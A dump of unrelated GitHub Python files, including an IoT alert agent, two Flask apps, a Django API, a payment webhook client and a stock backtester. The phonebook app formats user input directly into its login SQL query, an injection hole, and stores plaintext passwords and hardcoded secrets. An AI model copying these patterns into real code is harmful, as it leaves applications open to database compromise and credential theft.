agent's configuration specifies which topics to watch, the\n topic's threshold, and the message to send in an alert. Topics\n in the `watch_max` list trigger alerts when the published data\n are greater than the specified threshold. Topics in the\n `watch_min` list trigger alerts when the published data are\n less than the specified threshold. Non-numberic data will be\n ignored. Alerts are published to alert/TOPIC where TOPIC is the\n watched topic.\n\n Example configuration:\n\n .. code-block:: python\n\n {\n \"watch_max\": [\n {\n \"topic\": \"datalogger/log/platform/cpu_percent\",\n \"threshold\": 99,\n \"message\": \"CPU ({topic}) exceeded {threshold} percent\",\n \"enabled\": true\n }\n ]\n \"watch_min\": [\n {\n \"topic\": \"some/temperature/topic\",\n \"threshold\": 0,\n \"message\": \"Temperature is below {threshold}\",\n \"enabled\": true\n }\n ]\n }\n\n \"\"\"\n def __init__(self, config, **kwargs):\n self.config = config\n super(ThresholdDetectionAgent, self).__init__(**kwargs)\n\n @Core.receiver('onstart')\n def start(self, sender, **kwargs):\n\n def is_number(x):\n try:\n float(x)\n return True\n except ValueError:\n return False\n\n def generate_callback(message, threshold, comparator):\n \"\"\"generate callback function for pubsub.subscribe\"\"\"\n def callback(peer, sender, bus, topic, headers, data):\n if is_number(data):\n if comparator(data, threshold):\n alert_message = '{} ({} published {})\\n'.format(\n message, topic, data)\n self.alert(alert_message, topic)\n return callback\n\n comparators = {'watch_max': lambda x, y: x > y,\n 'watch_min': lambda x, y: x < y}\n\n for key, comparator in comparators.iteritems():\n for item in self.config.get(key, []):\n if item.get('enabled', True):\n # replaces keywords ({topic}, {threshold})\n # with values in the message:\n msg = item['message'].format(**item)\n callback = generate_callback(\n msg, item['threshold'], comparator)\n self.vip.pubsub.subscribe(\n 'pubsub', item['topic'], callback)\n\n def alert(self, message, topic):\n \"\"\"\n Raise alert for the given topic\n\n :param message: Message to include in alert\n :param topic: PUB/SUB topic that caused alert\n :type message: str\n :type topic: str\n \"\"\"\n status = Status.build(STATUS_BAD, message)\n self.vip.health.send_alert(topic, status)\n\n\ndef main(argv=sys.argv):\n '''Main method called by the platform.'''\n utils.vip_main(thresholddetection_agent)\n\nif __name__ == '__main__':\n # Entry point for script\n try:\n sys.exit(main())\n except KeyboardInterrupt:\n pass\n","repo_name":"bemoss/BEMOSS3.5","sub_path":"services/core/ThresholdDetectionAgent/thresholddetection/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"51"} +{"seq_id":"36176269818","text":"from flask import Flask, render_template, request, redirect, session, url_for\nimport pg\n\ndb = pg.DB(host=\"localhost\", user=\"postgres\", passwd=\"rocket\", dbname=\"phonebook\")\n\napp = Flask('phone book')\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/login', methods=['GET'])\ndef login():\n return render_template(\"login.html\")\n\n\n@app.route('/submit_login', methods=['POST', 'GET'])\ndef submit_login():\n username = request.form.get('username')\n password = request.form.get('password')\n query = db.query(\"select * from users where username = '%s'\" % username)\n result_list = query.namedresult()\n if len(result_list) > 0:\n user = result_list[0]\n if user.password == password:\n session['name'] = user.name\n return redirect('/contacts')\n else:\n return redirect('/login')\n else:\n return redirect('/login')\n\n\n@app.route('/logout_page')\ndef logout_page():\n return \"

    Goodbye!

    \"\n\n\n@app.route('/logout', methods=['POST', 'GET'])\ndef logout():\n del session['name']\n return redirect('/')\n\n\n@app.route('/contacts')\ndef contacts():\n contacts = db.query('select * from phonebook').namedresult()\n return render_template(\n 'contacts.html',\n title='All Contacts',\n contacts=contacts\n )\n\n\n@app.route('/new_contact')\ndef new_contact():\n return render_template(\n 'new_contact.html',\n title='New Contact'\n )\n\n\n@app.route('/submit_contact', methods=['POST'])\ndef submit_contact():\n name = request.form.get('name')\n phone_number = request.form.get('phone_number')\n email = request.form.get('email')\n db.insert('phonebook',\n name=name,\n phone_number=phone_number,\n email=email)\n return redirect('/contacts')\n\n\n@app.route('/update_contact')\ndef update_contact():\n id = int(request.args.get('id'))\n query = db.query('''\n select * from phonebook\n where id = %d''' % id)\n contact = query.namedresult()[0]\n return render_template(\n 'update_contact.html',\n contact=contact\n )\n\n\n@app.route('/submit_update', methods=['POST'])\ndef submit_update():\n id = int(request.form.get('id'))\n name = request.form.get('name')\n phone_number = request.form.get('phone_number')\n email = request.form.get('email')\n action = request.form.get('action')\n if action == 'update':\n db.update('phonebook', {\n 'id': id,\n 'name': name,\n 'phone_number': phone_number,\n 'email': email\n })\n elif action == 'delete':\n db.delete('phonebook', {'id': id})\n else:\n raise Exception(\"ERROR\")\n return redirect('/contacts')\napp.secret_key = 'cn0hn42'\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"MarvinM579/phonebook","sub_path":"phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7999993945","text":"for _ in range(int(input())):\n s = sorted(list(input()))\n m = int(input())\n b = list(map(int, input().split()))\n found = set()\n ans = [None] * m\n while len(found) != m:\n cur = set()\n let = s[-1]\n for i, c in enumerate(b):\n if i in found:\n continue\n tot = sum([abs(i - f) for f in found] + [0])\n if tot == c and s[-1] == let:\n cur.add(i)\n ans[i] = let\n while len(s) and s[-1] == let:\n s.pop()\n found.update(cur)\n print(''.join(ans))","repo_name":"Samhenry97/Competition","sub_path":"CodeForces/650 D3/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26763838852","text":"from pyqtgraph import PlotWidget\r\nfrom PyQt5 import QtCore, QtWidgets\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.setFixedSize(1030, 730)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.btn_frame = QtWidgets.QFrame(self.centralwidget)\r\n self.btn_frame.setGeometry(QtCore.QRect(10, 680, 1021, 80))\r\n self.btn_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.btn_frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.btn_frame.setObjectName(\"btn_frame\")\r\n self.layoutWidget = QtWidgets.QWidget(self.btn_frame)\r\n self.layoutWidget.setGeometry(QtCore.QRect(0, 10, 1011, 30))\r\n self.layoutWidget.setObjectName(\"layoutWidget\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.layoutWidget)\r\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.selectFolder_label = QtWidgets.QLabel(self.layoutWidget)\r\n self.selectFolder_label.setObjectName(\"selectFolder_label\")\r\n self.horizontalLayout.addWidget(self.selectFolder_label)\r\n self.directoryPath_lineEdit = QtWidgets.QLineEdit(self.layoutWidget)\r\n self.directoryPath_lineEdit.setReadOnly(True)\r\n self.directoryPath_lineEdit.setObjectName(\"directoryPath_lineEdit\")\r\n self.horizontalLayout.addWidget(self.directoryPath_lineEdit)\r\n self.selectFolder_toolButton = QtWidgets.QToolButton(self.layoutWidget)\r\n self.selectFolder_toolButton.setObjectName(\"selectFolder_toolButton\")\r\n self.horizontalLayout.addWidget(self.selectFolder_toolButton)\r\n spacerItem = QtWidgets.QSpacerItem(\r\n 40, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout.addItem(spacerItem)\r\n self.start_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.start_btn.setObjectName(\"start_btn\")\r\n self.horizontalLayout.addWidget(self.start_btn)\r\n self.stop_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.stop_btn.setObjectName(\"stop_btn\")\r\n self.horizontalLayout.addWidget(self.stop_btn)\r\n self.plot_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.plot_btn.setObjectName(\"plot_btn\")\r\n self.horizontalLayout.addWidget(self.plot_btn)\r\n self.export_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.export_btn.setObjectName(\"export_btn\")\r\n self.horizontalLayout.addWidget(self.export_btn)\r\n self.clear_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.clear_btn.setObjectName(\"clear_btn\")\r\n self.horizontalLayout.addWidget(self.clear_btn)\r\n self.folder_tree_frame = QtWidgets.QFrame(self.centralwidget)\r\n self.folder_tree_frame.setGeometry(QtCore.QRect(0, 0, 271, 671))\r\n self.folder_tree_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.folder_tree_frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.folder_tree_frame.setObjectName(\"folder_tree_frame\")\r\n self.layoutWidget1 = QtWidgets.QWidget(self.folder_tree_frame)\r\n self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 261, 661))\r\n self.layoutWidget1.setObjectName(\"layoutWidget1\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget1)\r\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.files_label = QtWidgets.QLabel(self.layoutWidget1)\r\n self.files_label.setObjectName(\"files_label\")\r\n self.verticalLayout_2.addWidget(self.files_label)\r\n self.folder_tree = QtWidgets.QTreeView(self.layoutWidget1)\r\n self.folder_tree.setObjectName(\"folder_tree\")\r\n self.verticalLayout_2.addWidget(self.folder_tree)\r\n self.status_lineEdit = QtWidgets.QLineEdit(self.layoutWidget1)\r\n self.status_lineEdit.setReadOnly(True)\r\n self.status_lineEdit.setObjectName(\"status_lineEdit\")\r\n self.verticalLayout_2.addWidget(self.status_lineEdit)\r\n self.plot_frame = QtWidgets.QFrame(self.centralwidget)\r\n self.plot_frame.setGeometry(QtCore.QRect(270, 10, 761, 661))\r\n self.plot_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.plot_frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.plot_frame.setObjectName(\"plot_frame\")\r\n self.layoutWidget2 = QtWidgets.QWidget(self.plot_frame)\r\n self.layoutWidget2.setGeometry(QtCore.QRect(10, 20, 741, 641))\r\n self.layoutWidget2.setObjectName(\"layoutWidget2\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget2)\r\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.plot_tip_temp = PlotWidget(self.layoutWidget2)\r\n self.plot_tip_temp.setObjectName(\"plot_tip_temp\")\r\n self.verticalLayout.addWidget(self.plot_tip_temp)\r\n self.plot_steam_temp = PlotWidget(self.layoutWidget2)\r\n self.plot_steam_temp.setObjectName(\"plot_steam_temp\")\r\n self.verticalLayout.addWidget(self.plot_steam_temp)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.actionOpen = QtWidgets.QAction(MainWindow)\r\n self.actionOpen.setObjectName(\"actionOpen\")\r\n self.actionSave = QtWidgets.QAction(MainWindow)\r\n self.actionSave.setObjectName(\"actionSave\")\r\n self.actionExit = QtWidgets.QAction(MainWindow)\r\n self.actionExit.setObjectName(\"actionExit\")\r\n self.actionSelect_Data_Repository = QtWidgets.QAction(MainWindow)\r\n self.actionSelect_Data_Repository.setObjectName(\r\n \"actionSelect_Data_Repository\")\r\n self.actionSelect_Data_Directory = QtWidgets.QAction(MainWindow)\r\n self.actionSelect_Data_Directory.setObjectName(\r\n \"actionSelect_Data_Directory\")\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\r\n \"MainWindow\", \"PILS Data Visualizer\"))\r\n self.selectFolder_label.setText(_translate(\r\n \"MainWindow\", \"Select PILS folder path:\"))\r\n self.selectFolder_toolButton.setText(_translate(\"MainWindow\", \"...\"))\r\n self.start_btn.setText(_translate(\"MainWindow\", \"Start Monitoring\"))\r\n self.stop_btn.setText(_translate(\"MainWindow\", \"Stop Monitoring\"))\r\n self.plot_btn.setText(_translate(\"MainWindow\", \"Plot Selected File \"))\r\n self.export_btn.setText(_translate(\"MainWindow\", \"Export as xlsx\"))\r\n self.clear_btn.setText(_translate(\"MainWindow\", \"Clear Plot\"))\r\n self.files_label.setText(_translate(\"MainWindow\", \"Files:\"))\r\n self.actionOpen.setText(_translate(\"MainWindow\", \"Open\"))\r\n self.actionSave.setText(_translate(\"MainWindow\", \"Export As xlsx\"))\r\n self.actionExit.setText(_translate(\"MainWindow\", \"Exit\"))\r\n self.actionSelect_Data_Repository.setText(\r\n _translate(\"MainWindow\", \"Select Data Repository\"))\r\n self.actionSelect_Data_Directory.setText(\r\n _translate(\"MainWindow\", \"Select Folder\"))\r\n","repo_name":"briankyk/pils-data-visualization-app","sub_path":"Ui_scripts.py","file_name":"Ui_scripts.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30402658385","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\n\nclass Score:\n def __init__(self):\n self.d = {\"Ravenclaw\": [],\n \"Gryffindor\": [],\n \"Slytherin\": [],\n \"Hufflepuff\": []}\n\ndef create_scatter_plot(df, subject1, subject2):\n score1 = Score()\n score2 = Score()\n for i in range(df.shape[0]):\n if df.loc[i][subject1] == df.loc[i][subject1] and df.loc[i][subject2] == df.loc[i][subject2]:\n score1.d[df.loc[i][\"Hogwarts House\"]].append(df.loc[i][subject1])\n score2.d[df.loc[i][\"Hogwarts House\"]].append(df.loc[i][subject2])\n\n\n plt.scatter(score1.d.get(\"Ravenclaw\"), score2.d.get(\"Ravenclaw\"), color=\"blue\", alpha=0.4)\n plt.scatter(score1.d.get(\"Gryffindor\"), score2.d.get(\"Gryffindor\"), color=\"red\", alpha=0.4)\n plt.scatter(score1.d.get(\"Slytherin\"), score2.d.get(\"Slytherin\"), color=\"green\", alpha=0.4)\n plt.scatter(score1.d.get(\"Hufflepuff\"), score2.d.get(\"Hufflepuff\"), color=\"yellow\", alpha=0.4)\n plt.title(f\"{subject1} and {subject2}\")\n plt.xlabel(subject1)\n plt.ylabel(subject2)\n plt.show()\n\n\n\nif __name__ == '__main__':\n df = pd.read_csv(\"dataset_train.csv\")\n subjects = [\"Arithmancy\",\n \"Astronomy\",\n \"Herbology\",\n \"Defense Against the Dark Arts\",\n \"Divination\",\n \"Muggle Studies\",\n \"Ancient Runes\",\n \"History of Magic\",\n \"Transfiguration\",\n \"Potions\",\n \"Care of Magical Creatures\",\n \"Charms\",\n \"Flying\"]\n\n if len(sys.argv) == 1:\n for i in range(len(subjects)):\n for j in range(i + 1, len(subjects)):\n create_scatter_plot(df, subjects[i], subjects[j])\n elif len(sys.argv) == 3 and sys.argv[1] in subjects and sys.argv[2] in subjects:\n create_scatter_plot(df, sys.argv[1], sys.argv[2])\n else:\n print(\"wrong arguments\")","repo_name":"mda-sha/dslr","sub_path":"scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12453759816","text":"import discord\nfrom discord.ext import commands\nimport warframe\n\nprint(warframe.find_url('Cool'))\n\nbot = commands.Bot(command_prefix='!',\n description='Warframe market price checker')\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n\n\n@bot.command()\nasync def hello():\n await bot.say('Hello!')\n\ntoken = open('token.txt','r').read()\nbot.run(token)\n","repo_name":"andrew-houghton/warframe-bot","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5363003203","text":"from flask import Flask, render_template, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, SelectField\nfrom wtforms.fields.html5 import URLField, TimeField\nfrom wtforms.validators import DataRequired, Length\nimport csv\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'\nBootstrap(app)\n\n\nclass CafeForm(FlaskForm):\n cafe = StringField(label='Cafe name', validators=[DataRequired(), Length(min=4)])\n location = URLField(label='Location', validators=[DataRequired()])\n opening_time = TimeField(label=\"Opening Time\", validators=[DataRequired()])\n closing_time = TimeField(label=\"Closing Time\", validators=[DataRequired()])\n coffee_rating = SelectField(label=\"Coffee Rating\", validators=[DataRequired()], choices=[\"☕\", \"☕☕\", \"☕☕☕\", \"☕☕☕☕\", \"☕☕☕☕☕\"])\n wifi = SelectField(label=\"Wifi Strength\", validators=[DataRequired()], choices=[\"💪\", \"💪💪\", \"💪💪💪\", \"💪💪💪💪\", \"💪💪💪💪💪\"])\n power = SelectField(label=\"Power Socket Availability\", validators=[DataRequired()], choices=[\"🔌\", \"🔌🔌\", \"🔌🔌🔌\", \"🔌🔌🔌🔌\", \"🔌🔌🔌🔌🔌\"])\n submit = SubmitField(label='Submit')\n\n\n# all Flask routes below\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route('/add', methods=[\"GET\", \"POST\"])\ndef add_cafe():\n form = CafeForm()\n if form.validate_on_submit():\n print(\"True\")\n with open('cafe-data.csv', mode=\"a\", newline='', encoding=\"utf-8\") as file:\n file.write(f\"\\n{form.cafe.data}, \"\n f\"{form.location.data}, \"\n f\"{form.opening_time.data}, \"\n f\"{form.closing_time.data},\"\n f\"{form.coffee_rating.data},\"\n f\"{form.wifi.data},\"\n f\"{form.power.data}\")\n return redirect(url_for('cafes'))\n return render_template('add.html', form=form)\n\n\n@app.route('/cafes')\ndef cafes():\n with open('cafe-data.csv', newline='', encoding='utf-8') as csv_file:\n csv_data = csv.reader(csv_file, delimiter=',')\n list_of_rows = []\n for row in csv_data:\n list_of_rows.append(row)\n return render_template('cafes.html', cafes=list_of_rows)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"EBR-code/coffee-wifi-flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9333790089","text":"from rest_framework.viewsets import GenericViewSet\nfrom rest_framework.mixins import ListModelMixin, RetrieveModelMixin, CreateModelMixin, UpdateModelMixin, DestroyModelMixin\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom apps.users.models import User\nfrom apps.users.permissions import IsOwner\nfrom apps.users.serialisers import UserCreateSerializer, UserDetailSerializer, GetUserInfoSerializer\nfrom apps.chats.models import Chat\n\n\nclass UserApiViewSet(GenericViewSet,\n CreateModelMixin,\n ListModelMixin):\n queryset = User.objects.all()\n serializer_class = UserCreateSerializer\n\n\nclass UserDetailApiViewSet(GenericViewSet,\n RetrieveModelMixin,\n UpdateModelMixin,\n DestroyModelMixin):\n queryset = User.objects.all()\n serializer_class = UserDetailSerializer\n permission_classes = [IsOwner]\n\n @action(\n detail=False, permission_classes=[IsAuthenticated], methods=[\"get\"]\n )\n def current_user(self, request, email=None):\n serializer = GetUserInfoSerializer(request.user)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(\n detail=False, permission_classes=[IsAuthenticated], methods=[\"get\"]\n )\n def another_user(self, request, email=None):\n lst = []\n chats = Chat.objects.filter(members__in=[request.user])\n for user in User.objects.all():\n for chat in chats:\n if user in chat.members.all() or user == request.user:\n continue\n lst.append(user)\n users = User.objects.filter(id__in=[i.id for i in set(lst)])\n serializer = UserDetailSerializer(users, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n","repo_name":"Saidulloh/Chat-API","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11884897401","text":"# -*- coding: utf-8 -*-\nimport uuid\n\nfrom yookassa.client import ApiClient\nfrom yookassa.domain.common.http_verb import HttpVerb\nfrom yookassa.domain.request.webhook_request import WebhookRequest\nfrom yookassa.domain.response.webhook_response import WebhookResponse, WebhookList\n\n\nclass Webhook:\n base_path = '/webhooks'\n\n def __init__(self):\n self.client = ApiClient()\n\n \"\"\"\n Get list of installed webhooks\n \n :return: WebhookList\n \"\"\"\n @classmethod\n def list(cls):\n instance = cls()\n path = cls.base_path\n\n response = instance.client.request(HttpVerb.GET, path)\n return WebhookList(response)\n\n \"\"\"\n Add webhook\n\n :param params: data passed to API\n :param idempotency_key:\n :return: WebhookResponse\n \"\"\"\n @classmethod\n def add(cls, params, idempotency_key=None):\n instance = cls()\n path = cls.base_path\n if not idempotency_key:\n idempotency_key = uuid.uuid4()\n headers = {\n 'Idempotence-Key': str(idempotency_key)\n }\n\n if isinstance(params, dict):\n params_object = WebhookRequest(params)\n elif isinstance(params, WebhookRequest):\n params_object = params\n else:\n raise TypeError('Invalid params value type')\n\n response = instance.client.request(HttpVerb.POST, path, None, headers, params_object)\n return WebhookResponse(response)\n\n \"\"\"\n Remove webhook\n\n :param webhook_id: \n :param idempotency_key:\n :return: WebhookResponse\n \"\"\"\n @classmethod\n def remove(cls, webhook_id, idempotency_key=None):\n instance = cls()\n path = cls.base_path + '/' + webhook_id\n if not idempotency_key:\n idempotency_key = uuid.uuid4()\n headers = {\n 'Idempotence-Key': str(idempotency_key)\n }\n\n response = instance.client.request(HttpVerb.DELETE, path, None, headers)\n return WebhookResponse(response)\n","repo_name":"yoomoney/yookassa-sdk-python","sub_path":"src/yookassa/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"51"} +{"seq_id":"12379424309","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncommission = 0.00015\ntax = 0.0025\n\n\nclass Trade:\n def __init__(self, initial_funds):\n self.initial_funds = initial_funds\n self.least_funds = initial_funds * 0.2\n self.investable_funds = initial_funds * 0.8\n self.stock_amount = 0\n\n def BuyStock(self, stock_price):\n amount_buy = self.investable_funds // stock_price\n if amount_buy <= 0:\n return False\n\n commission_buy = stock_price * amount_buy * commission\n if self.investable_funds - stock_price * amount_buy - commission_buy < 0:\n while True:\n amount_buy -= 1\n commission_buy = stock_price * amount_buy * commission\n if self.investable_funds - stock_price * amount_buy - commission_buy > 0:\n break\n\n self.stock_amount += amount_buy\n self.investable_funds -= stock_price * amount_buy + commission_buy\n self.initial_funds = self.investable_funds + self.least_funds\n return True\n\n def SellStock(self, stock_price):\n if self.stock_amount <= 0:\n return False\n\n commission_sell = (stock_price * self.stock_amount) * (commission + tax)\n self.investable_funds += self.stock_amount * stock_price\n self.investable_funds -= commission_sell\n self.stock_amount = 0\n self.initial_funds = self.investable_funds + self.least_funds\n return True\n\ndef SetInitial():\n data = pd.read_csv(\"./data/컴투스_일봉.csv\", header=None,\n names=['종목명', '종목코드', '날짜', '시가', '고가', '저가', '종가', '거래량'], encoding=\"CP949\")\n data = data.sort_values(by=['날짜'])\n data = data.reset_index(drop=True)\n\n trading_vol = 0\n for k in range(len(data.index)):\n trading_vol += data['거래량'].iloc[k]\n trading_vol /= len(data.index)\n\n OBV = []\n OBV.append(0)\n for i in range(1, len(data.index)):\n if data['종가'].iloc[i] > data['종가'].iloc[i - 1]:\n OBV.append(OBV[-1] + data['거래량'].iloc[i])\n elif data['종가'].iloc[i] < data['종가'].iloc[i - 1]:\n OBV.append(OBV[-1] - data['거래량'].iloc[i])\n else:\n OBV.append(OBV[-1])\n data['OBV'] = OBV\n data['OBV_ema'] = data['OBV'].ewm(span=12).mean()\n\n data['ema12'] = data['종가'].ewm(span=12).mean()\n data['ema26'] = data['종가'].ewm(span=26).mean()\n data['MACD'] = data.apply(lambda x: (x[\"ema12\"] - x[\"ema26\"]), axis=1)\n data['MACD_signal'] = data['MACD'].ewm(span=9).mean()\n data[\"MACD_oscillator\"] = data.apply(lambda x: (x[\"MACD\"] - x[\"MACD_signal\"]), axis=1)\n data[\"MACD_sign\"] = data.apply(lambda x: (\"매수\" if (0 > x[\"MACD\"] > x[\"MACD_signal\"])\n else (\"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] else 0)), axis=1)\n\n data[\"MACD_sign_with_volume\"] = data.apply(lambda x: (\n \"매수\" if (0 > x[\"MACD\"] > x[\"MACD_signal\"] and x['거래량'] >= trading_vol) else (\n \"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] and x['거래량'] >= trading_vol else 0)), axis=1)\n\n data[\"MACD_sign_with_OBV\"] = data.apply(lambda x: (\n \"매수\" if (0 > x[\"MACD\"] > x[\"MACD_signal\"] and x['OBV'] > x['OBV_ema']) else (\n \"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] and x['OBV'] < x['OBV_ema'] else 0)), axis=1)\n\n data['vol12'] = data['거래량'].ewm(span=12).mean()\n data['vol26'] = data['거래량'].ewm(span=26).mean()\n data['volume'] = data.apply(lambda x: (x[\"vol12\"] - x[\"vol26\"]), axis=1)\n data[\"MACD_sign_with_volume_cross\"] = data.apply(lambda x: (\n \"매수\" if (x[\"MACD_signal\"] < x[\"MACD\"] < 0 < x['volume']) else (\n \"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] and x['volume'] > 0 else 0)), axis=1)\n\n return data\n\nstock_data = SetInitial()\nstrategy = stock_data['MACD_sign_with_OBV']\n\nplt.rc('font', family='Malgun Gothic')\nplt.rcParams['axes.unicode_minus'] = False\n\nxtick = []\nfor i in np.arange(0, 700, 50):\n xtick.append(str(stock_data['날짜'].iloc[i]))\n\"\"\"\n# MACD, MACD signal chart\nplt.subplot(2, 1, 1)\nplt.title(\"MACD chart\")\nplt.plot(stock_data.index, stock_data[\"MACD\"], stock_data[\"MACD_signal\"])\nfor i in range(len(stock_data.index)):\n if strategy.iloc[i] == \"매수\":\n plt.scatter(stock_data.index[i], stock_data[\"MACD\"].iloc[i], color=\"r\", marker='^')\n elif strategy.iloc[i] == \"매도\":\n plt.scatter(stock_data.index[i], stock_data[\"MACD\"].iloc[i], color=\"b\", marker='v')\nplt.axhline(y=0, color='r', linewidth=1)\nplt.xticks(fontsize=6, rotation=45)\nplt.xticks(np.arange(0, 700, 50), xtick)\n\n# Oscillator bar\nplt.subplot(2, 1, 2)\nplt.title(\"MACD oscillator\")\noscillator = stock_data[\"MACD_oscillator\"]\nplt.bar(list(stock_data.index), list(oscillator.where(oscillator > 0)), 0.7)\nplt.bar(list(stock_data.index), list(oscillator.where(oscillator < 0)), 0.7)\nplt.axhline(y=0, color='r', linewidth=1)\nplt.xticks(fontsize=6, rotation=45)\nplt.xticks(np.arange(0, 700, 50), xtick)\n\nplt.subplots_adjust(hspace=0.8)\nplt.show()\n\"\"\"\n\n# backtesting\ninitial_money = int(input(\"initial money : \"))\ntesting = Trade(initial_money)\n\nsell_count = 0\nbuy_count = 0\n\nplt.title(\"매매 chart\")\nplt.plot(stock_data.index, stock_data['종가'])\n\nfor i in range(len(stock_data.index) - 1):\n if strategy.iloc[i] == '매수' or strategy.iloc[i] == '매도':\n print(\"\\033[0m\", end=\"\")\n if strategy.iloc[i] == '매수':\n if testing.BuyStock(stock_data['시가'].iloc[i]):\n print('\\033[95m', end=\"\")\n print(str(strategy.iloc[i]) + \" \" + str(stock_data['날짜'].iloc[i])\n + \" 시가 : \" + str(stock_data['시가'].iloc[i]), end=\"\")\n print(\"\\n자금 : \" + str(testing.initial_funds) + \" 보유 주식 : \" + str(testing.stock_amount) + '\\n')\n buy_count += 1\n plt.scatter(stock_data.index[i], stock_data['종가'].iloc[i], color=\"r\", marker='^')\n\n elif strategy.iloc[i] == '매도':\n if testing.SellStock(stock_data['시가'].iloc[i]):\n print('\\033[96m', end=\"\")\n print(str(strategy.iloc[i]) + \" \" + str(stock_data['날짜'].iloc[i])\n + \" 시가 : \" + str(stock_data['시가'].iloc[i]), end=\"\")\n print(\"\\n자금 : \" + str(testing.initial_funds) + \" 보유 주식 : \" + str(testing.stock_amount) + '\\n')\n sell_count += 1\n plt.scatter(stock_data.index[i], stock_data['종가'].iloc[i], color=\"b\", marker='v')\n \"\"\"\n if i == 0:\n if testing.BuyStock(stock_data['시가'].iloc[i]):\n print('\\033[95m', end=\"\")\n print(\"매수 \" + str(stock_data['날짜'].iloc[i]) + \" 시가 : \" + str(\n stock_data['시가'].iloc[i]), end=\"\")\n print(\"\\n자금 : \" + str(testing.initial_funds) + \" 보유 주식 : \" + str(testing.stock_amount) + '\\n')\n buy_count += 1\n \"\"\"\n\nif testing.SellStock(stock_data['시가'].iloc[++i]):\n print(\"매도 \" + str(stock_data['날짜'].iloc[i]) + \" \" + \" 시가 : \" + str(stock_data['시가'].iloc[i]))\n sell_count += 1\n plt.scatter(stock_data.index[i], stock_data['종가'].iloc[i], color=\"b\", marker='v')\n\nprint(\"\\nsell_count : \" + str(sell_count) + \"\\nbuy_count : \" + str(buy_count))\nprint(\"before investment : \" + str(initial_money))\nprint(\"after investment : \" + str(testing.initial_funds))\n\nplt.axhline(y=0, color='r', linewidth=1)\nplt.xticks(fontsize=6, rotation=45)\nplt.xticks(np.arange(0, 700, 50), 